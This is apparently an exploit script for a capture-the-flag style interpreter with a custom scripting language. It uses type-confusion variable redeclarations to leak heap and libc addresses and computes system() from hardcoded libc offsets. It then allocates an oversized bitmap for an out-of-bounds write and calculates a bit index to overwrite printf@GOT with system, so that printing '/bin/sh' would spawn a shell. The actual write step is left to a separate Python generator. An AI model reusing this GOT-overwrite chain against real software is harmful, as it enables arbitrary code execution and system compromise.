print("=== Write system_addr to printf@GOT ===");

print("Step 1: Leak addresses");
int leak1 = 0;
string leak1 = "first";
int addr1 = leak1;
print("addr1:");
print(addr1);

string v2 = "BBBBBBBB";
int v2 = 4231312;
int leaked = length(v2);
print("Leaked libc:");
print(leaked);

print("Step 2: Calculate system_addr");
int setvbufoffset = 558416;
int systemoffset = 362320;
int libcbase = leaked - setvbufoffset;
int systemaddr = libcbase + systemoffset;
print("system_addr:");
print(systemaddr);

print("Step 3: Create bitmap");
bitmap b1 = create(9223372036854775807, 2);

print("Step 4: Calculate bit_index for printf@GOT");
int gotaddr = 4202568;
int bitmapptr = addr1 - 4096;
int offsetgot = gotaddr - bitmapptr;
int bitindexgot = offsetgot * 8;
print("bit_index for GOT:");
print(bitindexgot);

print("Step 5: Write system_addr to printf@GOT");
print("Writing 64 bits...");
print("Note: Actual write code generated by Python");
print("Use: python3 rce_generate_write_code.py <bit_index_got> <system_addr>");

print("Step 6: Trigger shell");
print("print with /bin/sh");
